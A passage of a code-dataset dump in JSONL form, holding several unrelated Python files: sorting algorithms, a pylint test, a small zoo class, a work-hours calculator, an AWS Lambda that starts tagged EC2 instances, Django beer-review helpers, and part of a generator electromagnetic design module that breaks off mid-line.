l[k - 1]: l[k], l[k-1] = l[k-1], l[k]\n\ndef mergesort(l):\n\t\"\"\"\n\tSorts a list using a mergesort algorithm\n\t\tArgs:\n\t\t\tl [List] - list of comparable items\n\t\tReturns:\n\t\t\tl sorted\n\t\"\"\"\n\tdef merge(left, right):\n\t\tif not len(left) or not len(right):\n\t\t\treturn left or right\n\n\t\tresult = []\n\t\ti, j = 0, 0\n\t\twhile (len(result) < len(left) + len(right)):\n\t\t\tif left[i] < right[j]:\n\t\t\t\tresult.append(left[i])\n\t\t\t\ti+= 1\n\t\t\telse:\n\t\t\t\tresult.append(right[j])\n\t\t\t\tj+= 1\n\t\t\tif i == len(left) or j == len(right):\n\t\t\t\tresult.extend(left[i:] or right[j:])\n\t\t\t\tbreak\n\n\t\treturn result\n\n\tif len(l) < 2:\n\t\treturn l\n\n\tmiddle = len(l)/2\n\tleft = mergesort(l[:middle])\n\tright = mergesort(l[middle:])\n\n\treturn merge(left, right)\n\ndef insertionsort(l):\n\t\"\"\"\n\tSorts a list using a insertionsort algorithm\n\t\tArgs:\n\t\t\tl [List] - list of comparable items\n\t\tReturns:\n\t\t\tl sorted\n\t\"\"\"\n\tfor index in range(1,len(l)):\n\t\tcurrentvalue = l[index]\n\t\tposition = index\n\n\twhile position>0 and l[position-1]>currentvalue:\n\t\tl[position]=l[position-1]\n\t\tposition = position-1\n\n\t\tl[position]=currentvalue\n\ndef quicksort(l):\n\t\"\"\"\n\tSorts a list using a quicksort algorithm\n\t\tArgs:\n\t\t\tl [List] - list of comparable items\n\t\tReturns:\n\t\t\tl sorted\n\t\"\"\"\n\tif len(l) == 1 or len(l) == 0:\n\t\treturn l\n\telse:\n\t\tpivot = l[0]\n\t\ti = 0\n\t\tfor j in range(len(l)-1):\n\t\t\tif l[j+1] < pivot:\n\t\t\t\tl[j+1],l[i+1] = l[i+1], l[j+1]\n\t\t\t\ti += 1\n\t\tl[0],l[i] = l[i],l[0]\n\t\tleft = quicksort(l[:i])\n\t\tright = quicksort(l[i+1:])\n\t\tleft.append(l[i])\n\t\treturn left + right\n\ndef bogosort(l):\n\t\"\"\"\n\tSorts a list using the bogosort algorithm\n\t\tArgs:\n\t\t\tl [List] - list of comparable items\n\t\tReturns:\n\t\t\tl sorted\n\t\"\"\"\n\tdef inorder(x):\n\t\ti = 0\n\t\tj = len(x)\n\t\twhile i + 1 < j:\n\t\t\tif x[i] > x[i + 1]:\n\t\t\t\treturn False\n\t\ti += 1\n\treturn True\n\n\twhile not inorder(l):\n\t\tshuffle(l)\n\treturn l\n","sub_path":"Python2.7/Iterables/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"33829453","text":"\"\"\"Test for catching non-exceptions.\"\"\"\r\n# pylint: disable=too-many-ancestors, print-statement, no-absolute-import, import-error\r\nimport socket\r\n\r\nclass MyException(object):\r\n \"\"\"Custom 'exception'.\"\"\"\r\n\r\nclass MySecondException(object):\r\n \"\"\"Custom 'exception'.\"\"\"\r\n\r\nclass MyGoodException(Exception):\r\n \"\"\"Custom exception.\"\"\"\r\n\r\nclass MySecondGoodException(MyGoodException):\r\n \"\"\"Custom exception.\"\"\"\r\n\r\nclass SkipException(socket.error):\r\n \"\"\"Not an exception for Python 2, but one in 3.\"\"\"\r\n\r\nclass SecondSkipException(SkipException):\r\n \"\"\"Also a good exception.\"\"\"\r\n\r\ntry:\r\n 1 + 1\r\nexcept MyException: # [catching-non-exception]\r\n print(\"caught\")\r\n\r\ntry:\r\n 1 + 2\r\n# +1:[catching-non-exception,catching-non-exception]\r\nexcept (MyException, MySecondException):\r\n print(\"caught\")\r\n\r\ntry:\r\n 1 + 3\r\nexcept MyGoodException:\r\n print(\"caught\")\r\n\r\ntry:\r\n 1 + 3\r\nexcept (MyGoodException, MySecondGoodException):\r\n print(\"caught\")\r\n\r\ntry:\r\n 1 + 3\r\nexcept (SkipException, SecondSkipException):\r\n print(\"caught\")\r\n\r\ntry:\r\n 1 + 42\r\n# +1:[catching-non-exception,catching-non-exception]\r\nexcept (None, list()):\r\n print(\"caught\")\r\n\r\ntry:\r\n 1 + 24\r\nexcept None: # [catching-non-exception]\r\n print(\"caught\")\r\n\r\nEXCEPTION = None\r\nEXCEPTION = ZeroDivisionError\r\ntry:\r\n 1 + 46\r\nexcept EXCEPTION:\r\n print(\"caught\")\r\n\r\ntry:\r\n 1 + 42\r\n# +1:[catching-non-exception,catching-non-exception,catching-non-exception]\r\nexcept (list([4, 5, 6]), None, ZeroDivisionError, 4):\r\n print(\"caught\")\r\n\r\nEXCEPTION_TUPLE = (ZeroDivisionError, OSError)\r\nNON_EXCEPTION_TUPLE = (ZeroDivisionError, OSError, 4)\r\n\r\ntry:\r\n 1 + 42\r\nexcept EXCEPTION_TUPLE:\r\n print(\"caught\")\r\n\r\ntry:\r\n 1 + 42\r\nexcept NON_EXCEPTION_TUPLE: # [catching-non-exception]\r\n print(\"caught\")\r\n\r\nfrom missing_import import UnknownError\r\nUNKNOWN_COMPONENTS = (ZeroDivisionError, UnknownError)\r\n\r\ntry:\r\n 1 + 42\r\nexcept UNKNOWN_COMPONENTS:\r\n print(\"caught\")\r\n","sub_path":"proxySTAR_V3/certbot/venv/lib/python2.7/site-packages/pylint/test/functional/invalid_exceptions_caught.py","file_name":"invalid_exceptions_caught.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"547746114","text":"#Queremos una lista donde se puedan ingresar animales\nlista = []\nlist_type = []\nclass Animal:\n\tdef __init__(self):\n\t\t#Aqui irán los inputs\n\t\tcont =int(input(\"¿Cuántos animales entran?: \"))\n\t\tfor x in range (0,cont):\n\t\t\tself.name=input(\"¿Cuál es el nombre del animal?: \")\n\t\t\tlista.append(self.name)\n\t\t\tself.type = input(\"¿Qué tipo de animal es?: \")\n\t\t\tlist_type.append(self.type)\t\n\t\t\tprint (\"El animal \"+self.name+\" ha ingresado y es del tipo: \"+self.type)\n\t\tprint(\"La lista actual de animales es: \" + lista[:])\n\t\twhile True:\n\t\t\tid = int(input(\"Para cambiar el tipo de animal, escoge a un animal de la lista: \"))\n\t\t\tif(id==0):\n\t\t\t\tprint (\"La lista empieza del 1 a n\")\n\t\t\t\tprint (\"\")\n\t\t\telse:\n\t\t\t\ti--id\n\t\t\t\telegido = lista[id]\n\t\t\t\telegido_t= list_type[id]\n\t\t\t\tprint(\"El nombre del animal elegido es: \"+ elegido + \" y es del tipo: \" + elegido_t)\n\t\t\t\tself.NewType(id)\n\t\t\t\tbreak\n\n\tdef NewType(id):\n\t\t#Se registrará los nuevos tipos\n\t\tself.type = input (\"¿Cuál es el nuevo tipo de animal?: \")\n\t\tlist_type[id] = self.type\n\t\telegido = lista[id]\n\t\telegido_t= list_type[id]\n\t\tprint (\"El nuevo tipo es \" + elegido_t + \" del animal \" + \"elegido\")\nnew_animal = Animal()","sub_path":"ZooChapu.py","file_name":"ZooChapu.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"268909310","text":"import datetime\r\nimport math\r\nimport re # regex\r\nimport pyperclip\r\nfrom enum import Enum, unique\r\n\r\nimport timetracker as tt\r\n\r\n### Main Program ###\r\nnow = datetime.datetime.now()\r\n\r\n# %A dictates to use the actual day of the week (Sunday - Saturday)\r\nday = now.strftime(\"%A\").lower()\r\n\r\n# Time separated into Hour & Minutes\r\ncurrent_hour = now.hour\r\ncurrent_minute = now.minute\r\n\r\n\r\n# Will set this up to read from file or use dialog setup, later\r\n# That will help with using custom target_hours\r\nTARGET_HOURS_STANDARD = {\"monday\": 8, \"tuesday\": 16, \"wednesday\": 24,\r\n \"thursday\": 32, \"friday\": 40, \"saturday\": 48,\r\n \"sunday\": 56}\r\n\t\t\t\t\t\t \r\nTARGET_HOURS_MODIFIED = {\"monday\": 8, \"tuesday\": 8, \"wednesday\": 16,\r\n \"thursday\": 24, \"friday\": 32, \"saturday\": 48,\r\n \"sunday\": 56}\r\n\r\n# target_hours = TARGET_HOURS_STANDARD\r\ntarget_hours = TARGET_HOURS_STANDARD\r\n\r\n### INPUT ###\r\n# Whether or not you've taken your lunch. If you have, it's 0 (no time added to total) else 1\r\nlunch_taken = 0 #lunch_taken = ( 0 if ( input(\"Have you taken your lunch yet? (y/n)\\n\").lower() == 'y') else 1)\r\n\r\n\r\n### VARIABLE OVERRIDE ###\r\n#day = 'monday'\r\n### VARIABLE OVERRIDE ###\r\n\r\n\r\nhours_worked = tt.get_hours_worked_PS()\r\n\r\n# Time Remaining - Minutes & Seconds\r\ntime_remaining = target_hours[day] - hours_worked\r\n\r\n# Hours Remaining\r\nhours_remaining = int(time_remaining)\r\n\r\n# Minutes Remaining\r\nminutes_remaining = math.ceil( ( float(time_remaining % 1) * 60) )\r\n\r\n# Target time that the user should leave work for the day\r\ntarget_hour = (current_hour + hours_remaining) + lunch_taken\r\ntarget_minute = current_minute + minutes_remaining\r\n\r\ntarget_time = tt.to_time(target_hour, target_minute)\r\n\r\nprint(\"Time Worked:\", int(hours_worked//1), \"hours \", int( (hours_worked%1 * 60) ), \"minutes\\n\")\r\n\r\nprint(\"\\nLeave work by: \" + target_time + '\\n')\r\n\r\n# tt.create_leave_file(str(target_time))\r\n\r\ninput(\"Press ENTER to exit\")\r\n\r\n\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"512637352","text":"import os\nimport json\nimport boto3\n\n# AWS Region Name\nregion = os.getenv(\"AWS_REGION\") if os.getenv(\"AWS_REGION\") else \"us-east-1\"\n\n# AWS EC2 Resource Object\nec2 = boto3.resource(\"ec2\", region_name=region)\n\n# ==============================================================================\n# FUNCTION TO GET INSTANCES BY FILTER\n# ==============================================================================\n\ndef filter_instances():\n # Filter to EC2 Instances\n filters = [{\n 'Name': 'tag:env',\n 'Values': ['hom']\n },\n {\n 'Name': 'instance-state-name', \n 'Values': ['stopped']\n }\n ]\n # Get all EC2 Instances by Filter\n return ec2.instances.filter(Filters=filters) \n\n# ==============================================================================\n# LAMBDA HANDLER FUNCTION\n# ==============================================================================\n \ndef lambda_handler(event, context):\n # Get Instances\n instances = filter_instances()\n\n # Get each instance ID of Instances\n RunningInstances = [instance.id for instance in instances]\n\n # Show Instances\n for index, value in enumerate(RunningInstances):\n print(f\"Instance {index} - {value}\")\n\n # Check Instances with tag \"env\" and value \"hom\"\n if len(RunningInstances) > 0:\n print(f\"Starting {len(RunningInstances)} instances\")\n shuttingDown = ec2.instances.filter(InstanceIds=RunningInstances).start()\n else:\n print(\"We don't have any instance in hom to start\")\n\n return {\n \"statusCode\": 200,\n \"body\": json.dumps(\"success\")\n }\n","sub_path":"code/start_instance_one.py","file_name":"start_instance_one.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"186000","text":"from time import timezone\n\nimport pandas as pd\nimport numpy as np\nimport decimal\n\nfrom django.http import HttpResponse\n\nfrom .models import *\n\ndef loadFile() :\n return pd.read_csv('reviews_pr.csv')\n\ndef saveBeerDB(beer) :\n Beer(\n name = beer['beer_name'],\n brewery = beer['brewery_name'],\n style = beer['beer_style'],\n abv = beer['beer_abv'],\n img = \"null\",\n score = beer['rating'],\n total_score=beer['rating'],\n reviewCnt = 1\n ).save()\n\ndef updateBeerDB(beer):\n data = Beer.objects.get(name=beer['beer_name'])\n score = decimal.Decimal(data.score * data.reviewCnt)\n data.reviewCnt = data.reviewCnt + 1\n score = (score + decimal.Decimal(beer['rating'])) / data.reviewCnt\n data.score = round(score, 1)\n total_score = decimal.Decimal(data.total_score)\n total_score = total_score + decimal.Decimal(beer['rating'])\n data.total_score = round(total_score,1)\n data.save()\n\ndef saveBreweryDB(beerData):\n if Brewery.objects.filter(name=beerData['beer_style']):\n return\n else:\n Brewery(\n name = beerData['beer_style']\n ).save()\n\n\ndef saveUserDB(beerData):\n if User.objects.filter(username=beerData['user']):\n return\n else:\n User(\n username=beerData['user'],\n password=123\n ).save()\n\ndef saveReviewDB(beerData):\n user = User.objects.get(username=beerData['user'])\n beer = Beer.objects.get(name=beerData['beer_name'])\n BeerReview(\n user=user,\n beer_pk = beer.pk,\n beer_name = beer.name,\n review = \"good\",\n score = decimal.Decimal(beerData['rating']),\n # published_date = timezone.now()\n ).save()\n\ndef uploadData() :\n reviewsData = loadFile()\n\n # upload database\n for i in reviewsData.index:\n beerData = reviewsData.loc[i]\n # beer\n if Beer.objects.filter(name=beerData['beer_name']):\n updateBeerDB(beerData)\n else:\n print(\"savebeer\")\n saveBeerDB(beerData)\n\n saveUserDB(beerData)\n saveBreweryDB(beerData)\n saveReviewDB(beerData)\n\ndef deleteData():\n queryset = Beer.objects.all()\n queryset.delete()\n qu = Brewery.objects.all()\n qu.delete()\n q = BeerReview.objects.all()\n q.delete()\n\n\n\ndef updateBeerScore(beer, oldScore, newScore):\n data = Beer.objects.get(name=beer.name)\n\n beer.total_score=beer.total_score-oldScore+newScore\n\n #print('data.score : ' + str(data.score))\n #print('data.reviewCnt : ' + str(data.reviewCnt))\n\n if oldScore==decimal.Decimal(0):#기존 리뷰 존재 X\n data.reviewCnt = data.reviewCnt + 1\n print('save success')\n else:#기존 리뷰 존재\n print('update success')\n\n score = (beer.total_score) / data.reviewCnt\n data.score = round(score, 1)\n data.save()\n #print('data.total_score : ' + str( beer.total_score))\n #print('data.score : '+str(data.score))\n\ndef reviewUpdate(request):\n\n if request.POST['score']=='0':\n return HttpResponse(request)\n\n oldScore=0\n newScore=request.POST['score']\n beer=Beer.objects.all()[int(request.POST['beer_pk'])-1]\n\n #print('update')\n if BeerReview.objects.filter(user=request.user,beer_pk=request.POST['beer_pk']): # 기존 리뷰 평점 업데이트\n select=BeerReview.objects.get(user=request.user,beer_pk=request.POST['beer_pk'])\n oldScore=select.score\n select.score=decimal.Decimal(newScore)\n select.published_date=timezone.now()\n select.save()\n\n else:# 새로운 리뷰 작성\n BeerReview(\n user=request.user,\n beer_pk = request.POST['beer_pk'],\n beer_name=beer.name,\n review = \"Good\",\n score = request.POST['score'],\n published_date=timezone.now()\n ).save()\n\n updateBeerScore(beer,decimal.Decimal(oldScore),decimal.Decimal(newScore))\n\n return HttpResponse(request)\n\n\ndef getReviews(request):\n\n my_reviews=BeerReview.objects.filter(user=request.user).order_by('-published_date')\n\n '''\n 정렬 우선순위\n 1. 자신의 리뷰\n 2. 최신 리뷰\n '''\n\n other_reviews=BeerReview.objects.exclude(user=request.user).order_by('-published_date')\n\n return my_reviews|other_reviews","sub_path":"home/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"622724745","text":"\"\"\"eesgSE.py\nCreated by Latha Sethuraman, Katherine Dykes.\nCopyright (c) NREL. All rights reserved.\nElectromagnetic design based on conventional magnetic circuit laws\nStructural design based on McDonald's thesis \n\nThe pure-python part of an electrically excited generator module.\nThe OpenMDAO part is in eesgOM.py\n\"\"\"\n\nimport numpy as np\nfrom math import pi, cos, sqrt, radians, sin, exp, log10, log, tan, atan\nimport sys, os\n\nclass EESG(object):\n \"\"\" Estimates overall mass dimensions and Efficiency of Electrically Excited Synchronous generator. \"\"\"\n \n def __init__(self):\n\n super(EESG, self).__init__()\n self.debug = False\n\n #------------------------\n \n def compute(self, rad_ag, len_s, h_s, tau_p, N_f, I_f, h_ys, h_yr, machine_rating, n_nom, Torque, \n b_st, d_s, t_ws, n_r, n_s, b_r, d_r, t_wr, R_o, rho_Fe, rho_Copper, rho_Fes, shaft_cm, shaft_length,\n debug=False):\n \n # Assign values to universal constants\n g1 = 9.81 # m / s^2 acceleration due to gravity\n E = 2e11 # N / m^2 young's modulus\n sigma = 48.373e3 # shear stress of steel in psi (~333 MPa)\n mu_0 = pi * 4e-7 # permeability of free space in m * kg / (s**2 * A**2)\n phi = radians(90)\n \n # Assign values to design constants\n h_w = 0.005\n b_so = 0.004 # Stator slot opening\n m = 3 # number of phases\n q1 = 2 # no of stator slots per pole per phase\n b_s_tau_s = 0.45 # ratio of slot width to slot pitch\n k_sfil = 0.65 # Slot fill factor (not used)\n P_Fe0h = 4 # specific hysteresis losses W / kg @ 1.5 T @50 Hz\n P_Fe0e = 1 # specific eddy losses W / kg @ 1.5 T @50 Hz\n rho_Cu = 1.8e-8 * 1.4 # resisitivity of copper # ohm-meter (Why the 1.4 factor?)\n k_fes = 0.9 # iron fill factor (not used)\n y_tau_p = 1 # coil span / pole pitch fullpitch\n k_fillr = 0.7 # rotor slot fill factor\n k_s = 0.2 # magnetic saturation factor for iron\n T = Torque\n cos_phi = 0.85 # power factor\n \n # back iron thickness for rotor and stator\n t_s = h_ys\n t = h_yr\n \n # Aspect ratio\n K_rad = len_s / (2 * rad_ag)\n \n ###################################################### Electromagnetic design#############################################\n \n alpha_p = pi / 2 * .7 # (not used)\n dia = 2 * rad_ag # air gap diameter\n \n # air gap length and minimum values\n g = 0.001 * dia \n if g < 0.005 :\n g = 0.005\n \n r_r = rad_ag - g # rotor radius\n d_se = dia + 2 * h_s + 2 * h_ys # stator outer diameter (not used)\n p = np.round(pi * dia / (2 * tau_p)) # number of pole pairs\n S = 2 * p * q1 * m # number of slots of stator phase winding\n N_conductors = S * 2\n N_s = N_conductors / 2 / m # Stator turns per phase\n alpha = 180 / S / p # electrical angle (not used)\n \n tau_s = pi * dia / S # slot pitch\n h_ps = 0.1 * tau_p # height of pole shoe\n b_pc = 0.4 * tau_p # width of pole core\n h_pc = 0.6 * tau_p # height of pole core\n h_p = 0.7 * tau_p # pole height\n b_p = h_p\n b_s = tau_s * b_s_tau_s # slot width\n Slot_aspect_ratio = h_s / b_s\n b_t = tau_s - b_s # tooth width\n \n # Calculating Carter factor and effective air gap\n g_a = g\n K_C1 = (tau_s + 10 * g_a) / (tau_s - b_s + 10 * g_a) # salient pole rotor\n g_1 = K_C1 * g\n \n # calculating angular frequency\n om_m = 2 * pi * n_nom / 60\n om_e = 60\n f = n_nom * p / 60\n \n # Slot fill factor according to air gap radius\n \n if 2 * rad_ag > 2:\n K_fills = 0.65\n else:\n K_fills = 0.4\n \n # Calculating Stator winding factor \n \n k_y1 = sin(y_tau_p * pi / 2) # chording factor\n k_q1 = sin(pi / 6) / q1 / sin(pi / 6 / q1) # winding zone factor\n k_wd = k_y1 * k_q1\n \n # Calculating stator winding conductor length, cross-section and resistance\n \n shortpitch = 0\n l_Cus = 2 * N_s * (2 * (tau_p - shortpitch / m / q1) + len_s) # length of winding\n A_s = b_s * (h_s - h_w)\n A_scalc = b_s * 1000 * (h_s - h_w) * 1000 # cross section in mm^2\n A_Cus = A_s * q1 * p * K_fills / N_s\n A_Cuscalc = A_scalc * q1 * p * K_fills / N_s\n R_s = l_Cus * rho_Cu / A_Cus\n \n # field winding design, conductor length, cross-section and resistance\n \n N_f = np.round(N_f) # rounding the field winding turns to the nearest integer\n I_srated = machine_rating / (sqrt(3) * 5000 * cos_phi)\n l_pole = len_s - 0.050 + 0.120 # 50mm smaller than stator and 120mm longer to accommodate end stack\n K_fe = 0.95 \n l_pfe = l_pole * K_fe\n l_Cur = 4 * p * N_f * (l_pfe + b_pc + pi / 4 * (pi * (r_r - h_pc - h_ps) / p - b_pc))\n A_Cur = k_fillr * h_pc * 0.5 / N_f * (pi * (r_r - h_pc - h_ps) / p - b_pc)\n A_Curcalc = k_fillr * h_pc * 1000 * 0.5 / N_f * (pi * (r_r - h_pc - h_ps) / p - b_pc) * 1000 \n Slot_Area = A_Cur * 2 * N_f / k_fillr # (not used)\n R_r = rho_Cu * l_Cur / A_Cur # ohms\n \n # field winding current density\n \n J_f = I_f / A_Curcalc\n \n # calculating air flux density\n \n B_gfm = mu_0 * N_f * I_f / (g_1 * (1 + k_s)) # No-load air gap flux density\n \n B_g = B_gfm * 4*sin(0.5 * b_p * pi / tau_p) / pi # fundamental component\n B_symax = tau_p * B_g / pi / h_ys # stator yoke flux density\n L_fg = 2 * mu_0 * p * len_s * 4 * N_f**2 * ((h_ps / (tau_p - b_p)) + (h_pc / (3 * pi * (r_r - h_pc - h_ps) / p - b_pc))) # (not used)\n \n # calculating no-load voltage and stator current\n \n E_s = 2 * N_s * len_s * rad_ag * k_wd * om_m * B_g / sqrt(2) # no-load voltage\n #I_s = (E_s - (E_s**2 - 4 * R_s * machine_rating / m)**0.5) / (2 * R_s)\n erm = E_s**2 - 4 * R_s * machine_rating / m\n if erm < 0:\n sys.stderr.write('eesgSE ERROR: erm {:.2f} < 0 E_s {:.2f} R_s {:.2f} MachRtd {:.0f} m {}\\n'.format(erm[0], E_s[0], R_s[0], machine_rating[0], m))\n I_s = (E_s - erm**0.5) / (2 * R_s)\n \n # Calculating stator winding current density and specific current loading\n \n A_1 = 6 * N_s * I_s / (pi * dia)\n J_s = I_s / A_Cuscalc\n \n # Calculating magnetic loading in other parts of the machine\n \n delta_m = 0 # Initialising load angle\n \n # peak flux density in pole core, rotor yoke and stator teeth\n \n B_pc = (1 / b_pc) * ((2 * tau_p / pi) * B_g * cos(delta_m) + (2 * mu_0 * I_f * N_f * ((2 * h_ps / (tau_p - b_p)) + (h_pc / (tau_p - b_pc)))))\n B_rymax = 0.5 * b_pc * B_pc / h_yr\n B_tmax = (B_gfm + B_g) * tau_s * 0.5 / b_t\n \n # Calculating leakage inductances in the stator\n \n L_ssigmas = 2 * mu_0 * len_s * N_s**2 / p / q1 * ((h_s - h_w) / (3 * b_s) + h_w / b_so) # slot leakage inductance\n L_ssigmaew = mu_0 * 1.2 * N_s**2 / p * 1.2 * (2 / 3 * tau_p + 0.01) # end winding leakage inductance\n L_ssigmag = 2 * mu_0 * len_s * N_s**2 / p / q1 * (5 * (g / b_so) / (5 + 4 * (g / b_so))) # tooth tip leakage inductance\n L_ssigma = (L_ssigmas + L_ssigmaew + L_ssigmag) # stator leakage inductance\n \n # Calculating effective air gap\n \n '''\n What is the source of this function that combines 1st and 13th powers? Very suspicious...\n Inputs appear to be in the range of 0.45 to 2.2, so outputs are 180 to 178000\n \n Equations given without reference in:\n H. Polinder, J. G. Slootweg . “Design optimization of a synchronous generator for a direct-drive wind turbine,” \n (paper presented at the European Wind Energy Conference, Copenhagen, Denmark, July2–6, 2001\n \n def airGapFn(B, fact):\n val = 400 * B + 7 * B**13\n ans = val * fact\n sys.stderr.write('aGF: B {} val {} ans {}\\n'.format(B, val, ans))\n return val\n \n At_t = h_s * airGapFn(B_tmax, h_s)\n At_sy = tau_p / 2 * airGapFn(B_symax, tau_p/2)\n At_pc = (h_pc + h_ps) * airGapFn(B_pc, h_pc + h_ps)\n At_ry = tau_p / 2 * airGapFn(B_rymax, tau_p/2)\n '''\n At_g = g_1 * B_gfm / mu_0\n At_t = h_s * (400 * B_tmax + 7 * B_tmax**13)\n At_sy = tau_p * 0.5 * (400 * B_symax + 7 * B_symax**13)\n At_pc = (h_pc + h_ps) * (400 * B_pc + 7 * B_pc**13)\n At_ry = tau_p * 0.5 * (400 * B_rymax + 7 * B_rymax**13)\n g_eff = (At_g + At_t + At_sy + At_pc + At_ry) * g_1 / At_g\n \n L_m = 6 * k_wd**2 * N_s**2 * mu_0 * rad_ag * len_s / pi / g_eff / p**2\n B_r1 = (mu_0 * I_f * N_f * 4 * sin(0.5 * (b_p / tau_p) * pi)) / g_eff / pi # (not used)\n \n # Calculating direct axis and quadrature axes inductances\n L_dm = (b_p / tau_p +(1 / pi) * sin(pi * b_p / tau_p)) * L_m\n L_qm = (b_p / tau_p -(1 / pi) * sin(pi * b_p / tau_p) + 2 / (3 * pi) * cos(b_p * pi / 2 * tau_p)) * L_m\n \n # Calculating actual load angle\n \n delta_m = atan(om_e * L_qm * I_s / E_s)\n L_d = L_dm + L_ssigma # (not used)\n L_q = L_qm + L_ssigma # (not used)\n I_sd = I_s * sin(delta_m)\n I_sq = I_s * cos(delta_m)\n \n # induced voltage\n \n E_p = om_e * L_dm * I_sd + sqrt(E_s**2 - (om_e * L_qm * I_sq)**2) # (not used)\n # M_sf = mu_0 * 8*rad_ag * len_s * k_wd * N_s * N_f * sin(0.5 * b_p / tau_p * pi) / (p * g_eff * pi)\n # I_f1 = sqrt(2) * (E_p) / (om_e * M_sf)\n # I_f2 = (E_p / E_s) * B_g * g_eff * pi / (4 * N_f * mu_0 * sin(pi * b_p / 2/tau_p))\n # phi_max_stator = k_wd * N_s * pi * rad_ag * len_s * 2*mu_0 * N_f * I_f * 4*sin(0.5 * b_p / tau_p / pi) / (p * pi * g_eff * pi)\n # M_sf = mu_0 * 8*rad_ag * len_s * k_wd * N_s * N_f * sin(0.5 * b_p / tau_p / pi) / (p * g_eff * pi)\n \n L_tot = len_s + 2 * tau_p\n \n # Excitation power\n V_fn = 500\n Power_excitation = V_fn * 2 * I_f # total rated power in excitation winding\n Power_ratio = Power_excitation * 100 / machine_rating\n \n # Calculating Electromagnetically Active mass\n L_tot = len_s + 2 * tau_p # (not used)\n V_Cuss = m * l_Cus * A_Cus # volume of copper in stator\n V_Cusr = l_Cur * A_Cur # volume of copper in rotor\n V_Fest = len_s * pi * ((rad_ag + h_s)**2 - rad_ag**2) \\\n - 2 * m * q1 * p * b_s * h_s * len_s # volume of iron in stator tooth\n V_Fesy = len_s * pi * ((rad_ag + h_s + h_ys)**2 - (rad_ag + h_s)**2) # volume of iron in stator yoke\n V_Fert = l_pfe * 2 * p * (h_pc * b_pc + b_p * h_ps) # volume of iron in rotor pole\n V_Fery = l_pfe * pi * ((r_r - h_ps - h_pc)**2 - (r_r - h_ps - h_pc - h_yr)**2) # volume of iron in rotor yoke\n \n Copper = (V_Cuss + V_Cusr) * rho_Copper\n M_Fest = V_Fest * rho_Fe\n M_Fesy = V_Fesy * rho_Fe\n M_Fert = V_Fert * rho_Fe\n M_Fery = V_Fery * rho_Fe\n Iron = M_Fest + M_Fesy + M_Fert + M_Fery\n \n I_snom = machine_rating / (3 * E_s * cos_phi)\n \n ## Optional## Calculating mmf ratio\n F_1no_load = 3 * 2**0.5 * N_s * k_wd * I_s / (pi * p) # (not used)\n Nf_If_no_load = N_f * I_f\n F_1_rated = (3 * 2**0.5 * N_s * k_wd * I_srated) / (pi * p)\n Nf_If_rated = 2 * Nf_If_no_load\n Load_mmf_ratio = Nf_If_rated / F_1_rated\n \n ## Calculating losses\n #1. Copper losses\n K_R = 1.2 # skin effect correction coefficient\n P_Cuss = m * I_snom**2 * R_s * K_R\n P_Cusr = I_f**2 * R_r \n P_Cusnom_total = P_Cuss + P_Cusr # Watts\n \n #2. Iron losses ( Hysteresis and Eddy currents)\n P_Hyys = M_Fesy * (B_symax / 1.5)**2 * (P_Fe0h * om_e / (2 * pi * 60)) # Hysteresis losses in stator yoke\n P_Ftys = M_Fesy * (B_symax / 1.5)**2 * (P_Fe0e * (om_e / (2 * pi * 60))**2) # Eddy losses in stator yoke\n P_Fesynom = P_Hyys + P_Ftys\n P_Hyd = M_Fest * (B_tmax / 1.5)**2 * (P_Fe0h * om_e / (2 * pi * 60)) # Hysteresis losses in stator teeth\n P_Ftd = M_Fest * (B_tmax / 1.5)**2 * (P_Fe0e * (om_e / (2 * pi * 60))**2) # Eddy losses in stator teeth\n P_Festnom = P_Hyd + P_Ftd\n \n # brushes\n delta_v = 1\n n_brushes = I_f * 2 / 120\n \n if n_brushes < 0.5:\n n_brushes = 1\n else:\n n_brushes = np.round(n_brushes)\n \n #3. brush losses\n \n p_b = 2 * delta_v * I_f\n Losses = P_Cusnom_total + P_Festnom + P_Fesynom + p_b\n gen_eff = machine_rating * 100 / (Losses + machine_rating)\n \n ################################################## Structural Design ########################################################\n \n ## Structural deflection calculations\n \n # rotor structure\n \n q3 = B_g**2 / 2/mu_0 # normal component of Maxwell's stress\n #l = l_s # l - stator core length - now using l_s everywhere\n l_b = 2 * tau_p # end winding length # (not used)\n l_e = len_s + 2 * 0.001 * rad_ag # equivalent core length # (not used)\n a_r = (b_r * d_r) - ((b_r - 2 * t_wr) * (d_r - 2 * t_wr)) # cross-sectional area of rotor armms\n A_r = len_s * t # cross-sectional area of rotor cylinder\n N_r = np.round(n_r)\n theta_r = pi / N_r # half angle between spokes\n I_r = len_s * t**3 / 12 # second moment of area of rotor cylinder\n I_arm_axi_r = ((b_r * d_r**3) - ((b_r - 2 * t_wr) * (d_r - 2 * t_wr)**3)) / 12 # second moment of area of rotor arm\n I_arm_tor_r = ((d_r * b_r**3) - ((d_r - 2 * t_wr) * (b_r - 2 * t_wr)**3)) / 12 # second moment of area of rotot arm w.r.t torsion\n R = r_r - h_ps - h_pc - 0.5 * h_yr\n R_1 = R - h_yr * 0.5 # inner radius of rotor cylinder\n k_1 = sqrt(I_r / A_r) # radius of gyration\n m1 = (k_1 / R)**2 \n c = R / 500 # (not used)\n \n u_all_r = R / 10000 # allowable radial deflection \n b_all_r = 2 * pi * R_o / N_r # allowable circumferential arm dimension \n \n # Calculating radial deflection of rotor structure according to Mc Donald's\n Numer = R**3 * ((0.25 * (sin(theta_r) - (theta_r * cos(theta_r))) / (sin(theta_r))**2) - (0.5 / sin(theta_r)) + (0.5 / theta_r))\n Pov = ((theta_r / (sin(theta_r))**2) + 1 / tan(theta_r)) * ((0.25 * R / A_r) + (0.25 * R**3 / I_r))\n Qov = R**3 / (2 * I_r * theta_r * (m1 + 1))\n Lov = (R_1 - R_o) / a_r\n Denom = I_r * (Pov - Qov + Lov) # radial deflection % 